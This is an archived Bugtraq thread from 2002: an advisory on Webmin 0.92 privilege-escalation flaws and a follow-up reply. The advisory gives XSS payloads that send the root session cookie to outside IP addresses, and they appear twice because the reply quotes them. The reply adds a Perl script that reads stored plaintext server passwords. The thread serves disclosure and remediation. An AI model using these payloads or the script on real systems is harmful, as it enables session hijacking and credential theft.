linux, säkerhet

8172157 2002-03-21 10:01 +1200  /81 rader/  <advisory@prophecy.net.nz>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-21  00:49  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <21507>
Ärende: Local privalege escalation issues with Webmin 0.92
------------------------------------------------------------
From: <advisory@prophecy.net.nz>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0203210958150.13238-100000@salamander.incet.com>

18-02-02 -- advisory@prophecy.net.nz


About Webmin:
-------------
"Webmin is a web-based interface for system administration for Unix. Using
any browser that supports tables and forms (and Java for the File Manager
module), you can setup user accounts, Apache, DNS, file sharing and so
on."



Problem #1:
-----------
Version 0.92-1 of Webmin (when installed by rpm) leaves insecure
permissions on the /var/webmin directory.
This means that if command logging within webmin is enabled, any local
user
can read the /var/webmin/webmin.log file and retrieve the root users
sid (cookie session id).
It is trivial to then create a faked local cookie using this session-id,
and log directly into webmin as root.


Problem #2:
-----------
If a semi-trusted colleague is given a restricted level of
access to some Webmin functions, specifically sendmail, then
malicious code can be inserted into certain files
that would result in revealing roots webmin sid (cookie session id)
when the root user visits the related page in webmin.


Example Exploit:
----------------
Insert the following line into the virtusers file, and wait for the root
user to visit that page:
</tt></a></td><tt><td><script>/* */document.write('<img
src="http://192.168.40.1/'+document.cookie+'">');</script>

Or the following into the /etc/aliases file:
</a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*:
*/+zz+'src="http://10.1.1.33/'+document.cookie+'">');</script>

Potentially more likely to be exploited however, would be a malicious
local user who has _no_ access to webmin, who could change a file that
webmin views through the HTML
interface (where the code being read in is not checked for HTML).  An
example would be changing their
'real name' in /etc/passwd to be something along the lines of:
<script>zz=unescape("%3A");document.write('<img
src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script>
(Although chfn doesn't let you specify a username this long, but you get
the idea.)

This same problem exists in pretty much most parts of webmin, where
files (or command output like 'ps') is read in and displayed in the
web interface.



Solution:
---------
Upgrade to the latest version of Webmin (0.93), which fixes these issues
(as well as a couple of others apparently).
Available from:  http://www.webmin.com/download.html


Thanks to:
----------
Harry Metcalfe <harrym@the-group.org> - for giving me the original idea
about ways to steal cookies from webpages.
Jamie Cameron <jcameron@webmin.com> - for listening to me and making an
effort to keep in touch as he fixed the problem(s).
(8172157) / <advisory@prophecy.net.nz>/---(Ombruten)
Kommentar i text 8183648 av Ed <ekg@tricity.wsu.edu>
8183648 2002-03-20 18:22 -0800  /123 rader/ Ed <ekg@tricity.wsu.edu>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-23  03:45  av Brevbäraren
Extern mottagare: advisory@prophecy.net.nz
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <21565>
Kommentar till text 8172157 av  <advisory@prophecy.net.nz>
Ärende: Re: Local privalege escalation issues with Webmin 0.92
------------------------------------------------------------
From: Ed <ekg@tricity.wsu.edu>
To: advisory@prophecy.net.nz
Cc: bugtraq@securityfocus.com
Message-ID: <20020320182238.A2654@beta.tricity.wsu.edu>

as a small addendum to this advisory, we noticed some similar file
permission problems in /etc/webmin/servers/, in our local webmin
installation.  we were using webmin-0.92-1, noarch RPM version.  this
problem was reported to Jamie last month and is fixed in webmin 0.93.

this problem could allow a local user to read the webmin user
passwords for remote hosts running webmin, configured under the
'webmin' >> 'webmin servers' >> 'edit server' page.  this is a
problem only if we enter the login information for a server, so as to
enable auto-login, and thus, could lead to 'root' or 'admin' access
(on the remote webmin server) if we are using the cluster users,
groups, or packages feature of webmin.

the username and password are stored, in plaintext, with the rest of
the host information in /etc/webmin/servers/${time}.serv, where
${time} is the time that the remote server was first discovered by
the local webmin, measured as a number of seconds since the epoch.
/etc/webmin/servers has the search bit enabled, but not the read bit.
therefore we can read the server information files by searching
backwards from the current time, e.g.:

#!/usr/bin/perl
#read server info files by stepping backwards from current time
print STDERR "looking for server info from /etc/webmin/servers, press ^c to end\n";
for ($tstamp= time(); $tstamp > 0; $tstamp--) {
  open (SERVINFO, "</etc/webmin/servers/$tstamp.serv") or next;
  print "contents of /etc/webmin/servers/$tstamp.serv:\n";
  print <SERVINFO>;
  close SERVINFO or die "error detected on file close";
}

moral: if you were running a vulnerable version of webmin, it may be
prudent to change all your passwords after you upgrade, as they may
have been exposed.  also i might double-check that these files are
not  readable, on all of your webmin servers.

thanks to Jamie for making such a great web administration package for
unix, and keeping on top of security problems/reports.

  Ed

advisory@prophecy.net.nz [Thu, Mar 21, 2002 at 10:01:21AM +1200]
> 18-02-02 -- advisory@prophecy.net.nz
> 
> 
> About Webmin:
> -------------
> "Webmin is a web-based interface for system administration for Unix. Using
> any browser that supports tables and forms (and Java for the File Manager
> module), you can setup user accounts, Apache, DNS, file sharing and so
> on."
> 
> 
> 
> Problem #1:
> -----------
> Version 0.92-1 of Webmin (when installed by rpm) leaves insecure
> permissions on the /var/webmin directory.
> This means that if command logging within webmin is enabled, any local
> user
> can read the /var/webmin/webmin.log file and retrieve the root users
> sid (cookie session id).
> It is trivial to then create a faked local cookie using this session-id,
> and log directly into webmin as root.
> 
> 
> Problem #2:
> -----------
> If a semi-trusted colleague is given a restricted level of
> access to some Webmin functions, specifically sendmail, then
> malicious code can be inserted into certain files
> that would result in revealing roots webmin sid (cookie session id)
> when the root user visits the related page in webmin.
> 
> 
> Example Exploit:
> ----------------
> Insert the following line into the virtusers file, and wait for the root
> user to visit that page:
> </tt></a></td><tt><td><script>/* */document.write('<img
> src="http://192.168.40.1/'+document.cookie+'">');</script>
> 
> Or the following into the /etc/aliases file:
> </a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*:
> */+zz+'src="http://10.1.1.33/'+document.cookie+'">');</script>
> 
> Potentially more likely to be exploited however, would be a malicious
> local user who has _no_ access to webmin, who could change a file that
> webmin views through the HTML
> interface (where the code being read in is not checked for HTML).  An
> example would be changing their
> 'real name' in /etc/passwd to be something along the lines of:
> <script>zz=unescape("%3A");document.write('<img
> src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script>
> (Although chfn doesn't let you specify a username this long, but you get
> the idea.)
> 
> This same problem exists in pretty much most parts of webmin, where files
> (or command output like 'ps') is
> read in and displayed in the web interface.
> 
> 
> 
> Solution:
> ---------
> Upgrade to the latest version of Webmin (0.93), which fixes these issues
> (as well as a couple of others apparently).
> Available from:  http://www.webmin.com/download.html
> 
> 
> Thanks to:
> ----------
> Harry Metcalfe <harrym@the-group.org> - for giving me the original idea
> about ways to steal cookies from webpages.
> Jamie Cameron <jcameron@webmin.com> - for listening to me and making an
> effort to keep in touch as he fixed the problem(s).
>
(8183648) /Ed <ekg@tricity.wsu.edu>/------(Ombruten)